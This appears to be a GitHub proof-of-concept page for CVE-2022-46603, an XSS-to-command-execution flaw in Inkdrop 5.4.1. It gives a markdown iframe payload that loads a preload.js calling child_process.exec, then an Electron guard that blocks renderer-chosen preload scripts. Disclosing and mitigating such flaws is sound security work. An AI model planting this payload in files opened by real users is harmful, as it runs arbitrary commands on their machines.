CVE-2022-46603: GitHub - 10cks/inkdropPoc: inkdrop XSS to RCE Poc
An issue in Inkdrop v5.4.1 allows attackers to execute arbitrary commands via uploading a crafted markdown file.
Inkdrop XSS to RCE PoC
Product Presentation:
Solely designed for Markdown to improve your dev workflow. Get a low-friction personal note-taking workflow and accomplish more. With your notes well-organized effortlessly, you can stay focused on doing your best work.
Product Website: https://www.inkdrop.app/
Product download Address: https://d3ip0rje8grhnl.cloudfront.net/v5.4.1/Inkdrop-demo-5.4.1-Windows.zip
Version: 5.4.1
Payload: write the payload into a markdown file and open it in Inkdrop. The `preload` attribute must point at `preload.js` by absolute path, so the path used here, inside the author's extracted demo directory, has to match where `preload.js` actually sits on the target. The first line only proves script execution (XSS); the second is the one that loads `preload.js` and gives command execution (RCE).

```html
<iframe src=javascript:alert('xss')></iframe>
<iframe src=1 preload="C:\Users\root\Downloads\Inkdrop-demo-5.4.1-Windows\resources\app\preload.js"></iframe> <!-- absolute path to preload.js -->
```
preload.js (the script the `preload` attribute above points at; Electron runs it with Node APIs available, which is what lets it spawn a process):

```js
// preload.js: executed by Electron with Node APIs available, so child_process is reachable
require('child_process').exec('calc.exe')
```
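The root cause is that page content gets to choose a preload script, and in Electron a preload script named by a `<webview>`'s `preload` attribute runs before the guest page with Node APIs available (in a non-sandboxed webview), which is why `preload.js` above can reach `child_process`. The README shows the attribute on an `<iframe>` and does not say how Inkdrop's renderer honours it; the guard below, an added example that is not Inkdrop's code or the PoC's, covers Electron's attach hook regardless of which tag the note author writes. It uses Electron's real `web-contents-created`, `will-attach-webview`, `will-navigate` and `setWindowOpenHandler` hooks; `app` is assumed to be `require('electron').app` in a real main process and is passed in so the decision logic runs without Electron. `isAllowedSrc`, `guardWebviewAttach`, `installWebviewGuard` and the allow-list origin are names chosen for this example.

```javascript
// Added example, not code from the inkdropPoc repository or from Inkdrop:
// an Electron main-process guard for the <webview> attach path the PoC abuses.
// The guard drops any preload the renderer asked for, forces Node integration
// off, and refuses webviews and navigations outside an allow-list of origins.
// `app` is Electron's app object (require('electron').app in a real main
// process); it is injected so the decision logic can run without Electron.
// Function names and the allow-list are chosen for this example.

// Only plain http(s) URLs on an allow-listed origin may be attached or navigated to.
// Non-URLs ('1'), javascript: URLs and Windows paths ('C:\...' parses as scheme "c:")
// all fail this check.
function isAllowedSrc(src, allowedOrigins) {
  let url;
  try {
    url = new URL(String(src));
  } catch {
    return false;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return false;
  return allowedOrigins.includes(url.origin);
}

// Sanitizes the webPreferences a renderer asked for (mutated in place, as the
// Electron hook expects) and returns whether the <webview> may attach at all.
function guardWebviewAttach(webPreferences, params, allowedOrigins) {
  delete webPreferences.preload;     // never let page content pick a preload script
  delete webPreferences.preloadURL;
  webPreferences.nodeIntegration = false;
  webPreferences.contextIsolation = true;
  webPreferences.sandbox = true;
  return isAllowedSrc(params && params.src, allowedOrigins);
}

// Wires the guard into Electron's hooks; call once from the main process,
// e.g. installWebviewGuard(app, ['https://notes.example']).
function installWebviewGuard(app, allowedOrigins) {
  app.on('web-contents-created', (_event, contents) => {
    contents.on('will-attach-webview', (event, webPreferences, params) => {
      if (!guardWebviewAttach(webPreferences, params, allowedOrigins)) event.preventDefault();
    });
    contents.on('will-navigate', (event, url) => {
      if (!isAllowedSrc(url, allowedOrigins)) event.preventDefault();
    });
    // window.open() from any renderer is denied outright.
    contents.setWindowOpenHandler(() => ({ action: 'deny' }));
  });
}
```

Note that the guard does not try to validate the preload path: whether the file exists or what it contains is irrelevant once renderer-chosen preloads are refused, which is the property a reviewer should look for in the fix rather than a blocklist of paths.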
POC video